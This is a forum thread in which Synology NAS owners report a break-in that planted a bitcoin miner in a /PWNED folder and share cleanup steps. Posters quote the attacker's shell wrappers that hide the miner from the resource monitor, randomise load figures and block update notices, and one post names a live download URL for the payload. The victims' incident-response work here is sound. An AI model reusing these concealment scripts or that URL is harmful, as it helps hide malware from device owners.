hacked ressource Monitor

[DustinF00]

I deleted the folders and files from root access.

Changed passwords - not sure what else to do. I can shut down access to Survailence from the outside but that defeats the checking in I do while I am not there.

I should turn off remote management - that will be next.

none of it makes sense.

[Gozem]

Same problem here. More info in a Facebook post:
https://www.facebook.com/synology/posts ... 7533142897

I had web-server (port 80) and DSM https on port 5001 running. All blocked now. Entry probably was one of them.

[Gozem]

With the amount of changed files it is pretty apparent that we need to reinstall the system. How do we backup all settings and configs and reinstall, without losing /volume1? Is it even possible?

Also, we need to know how they got in and that the security hole is blocked.

Please Synology, reply to these posts, at least that you have seen this and are working on it.

[Gozem]

I too have found I have been hacked and my resource monitor "tampered with" - I guess to hide the massive resource usage from the hackers who ran bitcoin mining software


I got suspicious when my Rack Station started to seem really slow - I logged in ssh and ran TOP and saw 3 processes using 25% CPU - they were called PWNEDm going to an IP address of 46.244.18.176 on port 9555

It seem to download from here: http://65.36.55.70:5000/jynx2.so

I then noticed the PWNED folder -- i was able to kill the three tasks and delete the folder

The tasks were called PWNEDm - upon looking at this with a hex editor it is clearly just "mined" renamed - a BitCoin miner

What is scary is that they seem to know they were running on a DiksStation as some of the files/scripts appear to reference Synology file paths so they can overwirte files and hide their presence.

I am reluctant to reboot as maybe some Synology files are damaged -- I can already see a few scripts such as:

top.cgi:
#!/bin/sh
/usr/syno/synoman/webman/modules/ResourceMonitor/top2.cgi | awk -v RS='[^\n]*\n*[^\n]*(PWNED|top2.cgi)([^\n]*\n){6}' '{print}' ORS=""

upgrade.cgi:
#!/bin/sh
/usr/syno/synoman/webman/modules/ControlPanel/modules/upgrade2.cgi | sed -e 's/\("available_for_download" *: *\).*,/\1 false,/'


rsrcmonitor3.cg1:
#!/bin/sh
rand1=$((RANDOM%10))
rand2=$((RANDOM%10))
rand3=$((RANDOM%10))
rand4=$((RANDOM%10))
rand5=$((RANDOM%10))
rand6=$((RANDOM%10))

/usr/syno/synoman/webman/modules/ResourceMonitor/rsrcmonitor3.cgi | sed -e "s/\(\"15minLoad\" *: *\)[0-9]*\(,*\)/\1$rand1\2/" -e "s/\(\"1minLoad\" *: *\)[0-9]*\(,*\)/\1$rand2\2/" -e "s/\(\"5minLoad\" *: *\)[0-9]*\(,*\)/\1$rand3\2/" -e "s/\(\"OtherLoad\" *: *\)[0-9]*\(,*\)/\1$rand4\2/" -e "s/\(\"SystemLoad\" *: *\)[0-9]*\(,*\)/\1$rand5\2/" -e "s/\(\"UserLoad\" *: *\)[0-9]*\(,*\)/\1$rand6\2/"



These appear to overwrite some Synology files


Before I reboot, what I would like to know is if I look at all the scripts and note down all the files they modify could I copy "clean" files from my DS214+ to my RackStation 2212+ ???

I do have pretty tight password set too -- containing numbers, letters and some punctuation chars -- very weird!

If anyone wants the whole PWNED folder I kept a copy and can email it or goto my blog: http://thesbsguy.com/?p=244

Sev

I removed the /PWNED directory and mv:ed back the changed .cgi files you mention above. I also updated the DSM to latest and rebooted. Works fine. I am about to manually update the DSM again now with the downloaded .pat file to try to make sure that the system files gets reinstalled. As the upgrade.cgi files seems changed.

[Gozem]

I removed the /PWNED directory and mv:ed back the changed .cgi files you mention above. I also updated the DSM to latest and rebooted. Works fine. I am about to manually update the DSM again now with the downloaded .pat file to try to make sure that the system files gets reinstalled. As the upgrade.cgi files seems changed.

Sadly I could not do a manual upgrade as it says my upgrade file is older than the one I have. It should actually be of the same version. Or the hack prevents me from manual upgrade, somehow.

[Gozem]

There seems to be three rsrcmonitor*.cgi: files on my system. rsrcmonitor2.cgi calls rsrcmonitor3.cgi with some random load generated form an .sh-script. However file 1 and 3 are binaries. Which one is correct, and what should they be named? Currently I renamed 3.cgi to 2.cgi and overwriting the sh-script, just as I did with the other files.

Seems to be working correct after a reboot as far as I can tell.

[Gozem]

There seems to be three rsrcmonitor*.cgi: files on my system. rsrcmonitor2.cgi calls rsrcmonitor3.cgi with some random load generated form an .sh-script. However file 1 and 3 are binaries. Which one is correct, and what should they be named? Currently I renamed 3.cgi to 2.cgi and overwriting the sh-script, just as I did with the other files.

Seems to be working correct after a reboot as far as I can tell.

Asking a friend who has the same (unhacked) system as I do and the two rsrcmonitor files seem legit:
> ls -l /usr/syno/synoman/webman/modules/ResourceMonitor
-rw-r--r-- 1 root root 1944 Aug 23 15:33 config
-rw-r--r-- 1 root root 152 Aug 23 15:33 helptoc.conf
drwxr-xr-x 7 root root 4096 Oct 20 10:08 images
-rw-r--r-- 1 root root 179 Aug 23 15:33 index.conf
-rw-r--r-- 1 root root 92150 Aug 23 15:33 resource.js
-rwxr-xr-x 1 root root 86952 Oct 8 09:09 rsrcmonitor.cgi
-rwxr-xr-x 1 root root 61568 Oct 8 09:09 rsrcmonitor2.cgi
-rwxr-xr-x 1 root root 24956 Oct 8 09:09 setting.cgi
-rwxr-xr-x 1 root root 14882 Aug 23 15:33 style.css
-rwxr-xr-x 1 root root 15644 Oct 8 09:09 top.cgi

[Doolbr]

That one is indeed legit and should be renamed back to rsrcmonitor2.cgi
Luckily they were lazy and just renamed the original files.
The new files are just executing the original files and then modify the output (hiding the PWNED processes)
In my case the new files were all with userid 502 and group id 20
You can try and do a recursive search on /:
find / -user 502 -print
I myself didn't find any other files.


As for the failed upgrade, you might want to try and edit the versionnumber of the update (smallfixnumber). the firmware.pat are just compressed files which can be extracted like a zip (just rename to firmware.zip) and then edit the VERSION file to contain a higher number. After that compress everything and rename back to .pat and try to upgrade with that firmware.

[Gozem]

As for the failed upgrade, you might want to try and edit the versionnumber of the update (smallfixnumber). the firmware.pat are just compressed files which can be extracted like a zip (just rename to firmware.zip) and then edit the VERSION file to contain a higher number. After that compress everything and rename back to .pat and try to upgrade with that firmware.

I figured that the firmware Synology provide are the base firmware of 4.3-3810. To get update4 you have to patch via the DSM interface. I was probably trying to install DSM 4.3-3810 (update1 or 0).

But since noone else has found anymore tampered/bad files I'll wait on bigger actions (full reinstall?) until we know how they came in, and that the security hole is fixes.

[vierendeel]

I also found a \PWNED directory on my DS412+. I deleted the directory, but am a little confused about all the changed files being mentioned here and what to do about it. Which rscrcmonitor*.cgi files are legit and which one(s) do I delete? Do I need to replace the legit/modified rscrcmonitor*.cgi files with clean ones, and if so, where can I find them?

I'm a bit of a linux novice, and new to Synology devices. I just purchased my DS412+ last week. Not a real great feeling getting hacked less than a week into owning the device.

[DustinF00]

I know nothing about the Linux system and commands, I am also running the headless crashplan package.

Not sure what else to do. I dont know how to organize the search for the file changes, too much data to back up as I've been trying to get it into the cloud. Not sure what else to do.

[Gozem]

I will update this post when new info comes in.

Here is how you clean it (so far that I've detected on my DS1812+). Also note that this is not an guarantee that you are 100% clean. We (this thread and the linked Facebook thread) might have missed something.

NOTE: Do this on your own risk!
I write this form memory as I already clean out the files and can't test my instructions again.

1. Either disconnect the Synology from Internet or configure a Firewall in DSM in the Control Panel. Either way, avery angry Firewall (especially on port 80,443,5000 and 5001) is bare minimum since we do not know if this security hole is fixed or not. You might just get infected again.

2. Enable ssh and log in using a command shell in Linux/Mac OSX (or get putty for Windows) as root@your-diskstations-ip with the same password as the user "admin" has.

3. All altered files seems to be owned by user id 502. Run:

Code: Select all

find / -xdev -user 502

Post the result here so we can investigate further.
The above command will search for files starting in / (the root) and look for files with user id 502. -xdev means that it should not enter into new mounted disks, like /volume1 which might take a LOOOONG time if you have a lot of files.

4. kill the bitcoin mining processes. You can easily see them eating of the CPU using the command 'top'. Press q to exit top.
Run:

Code: Select all

killall PWNEDm

Possibly also run:

Code: Select all

killall PWNEDb

(I can't remember if there was one more process running or not. Use

Code: Select all

ps |grep PWNED

to search for PWNED processes and kill them.

5. Remove the /PWNED directory:

Code: Select all

rm -r /PWNED

6. Move back 3 .cgi files that has been moved and are being called from new hacked copies:
Check that the target files you are about to overwrite are actually shell files:

Code: Select all

more /usr/syno/synoman/webman/modules/ResourceMonitor/top.cgi
more /usr/syno/synoman/webman/modules/ControlPanel/modules/upgrade.cgi
more /usr/syno/synoman/webman/modules/ResourceMonitor/rsrcmonitor2.cgi

(Yes note the 2.cgi one)

Move back the original files:. Note the change in numbers on the last one.

Code: Select all

mv /usr/syno/synoman/webman/modules/ResourceMonitor/top2.cgi /usr/syno/synoman/webman/modules/ResourceMonitor/top.cgi

mv /usr/syno/synoman/webman/modules/ControlPanel/modules/upgrade2.cgi /usr/syno/synoman/webman/modules/ControlPanel/modules/upgrade.cgi

mv /usr/syno/synoman/webman/modules/ResourceMonitor/rsrcmonitor3.cgi /usr/syno/synoman/webman/modules/ResourceMonitor/rsrcmonitor2.cgi

The forum seems to format the above a bit strange, but it is normal mv command.

7. Possibly reboot your station here to make sure DSM runs on the good .cgi files.

8. Update your DSM to latest.

9. Look for more infections I've read about but I did not have them. Don't know what to do with it exactly if you find it. Probably remove it.
Look for the directory /volume1/startup

All files been altered seems to be from user with id 502.
Try to find more files:

Code: Select all

find / -user 502

If you have a lot of files on your diskstation that will take a LONG time. To only search in the DSM system areas use:

Code: Select all

find / -xdev -user 502

Please post replies on any errors in my instructions, additions or other help you need.

[Doolbr]

Sorry, that was my mistake, it was uid 502

Luckily, i could still find it in my terminal backlog, added a screenshot:

Code: Select all

> ls -l
-rw-r--r--    1 root     root          1944 Nov  5 22:53 config
-rw-r--r--    1 root     root           152 Nov  5 22:53 helptoc.conf
drwxr-xr-x    7 root     root          4096 Nov 16 22:56 images
-rw-r--r--    1 root     root           179 Nov  5 22:53 index.conf
-rw-r--r--    1 root     root         92150 Nov  5 22:53 resource.js
-rwxr-xr-x    1 root     root         86952 Nov  5 22:53 rsrcmonitor.cgi
-rwxr-xr-x    1 502      20             532 Feb  3 17:40 rsrcmonitor2.cgi
-rwxr-xr-x    1 root     root         61568 Nov  5 22:53 rsrcmonitor3.cgi
-rwxr-xr-x    1 root     root         24956 Nov  5 22:53 setting.cgi
-rwxr-xr-x    1 root     root         14882 Nov  5 22:53 style.css
-rwxr-xr-x    1 root     root         15644 Nov  5 22:53 top.cgi

[Gozem]

Here are a few bugs probably related to this:

http://www.cvedetails.com/vulnerability ... ology.html
http://web.nvd.nist.gov/view/vuln/detai ... -2013-6955

The release notes doesn't give much hints:
http://www.synology.com/en-global/relea ... del/DS1812+

Synology: Please hi-light security issues better in your notes.

[Doolbr]

Multiple directory traversal vulnerabilities in the FileBrowser components in Synology DiskStation Manager (DSM) before 4.3-3810 Update 3

I already had Update 3.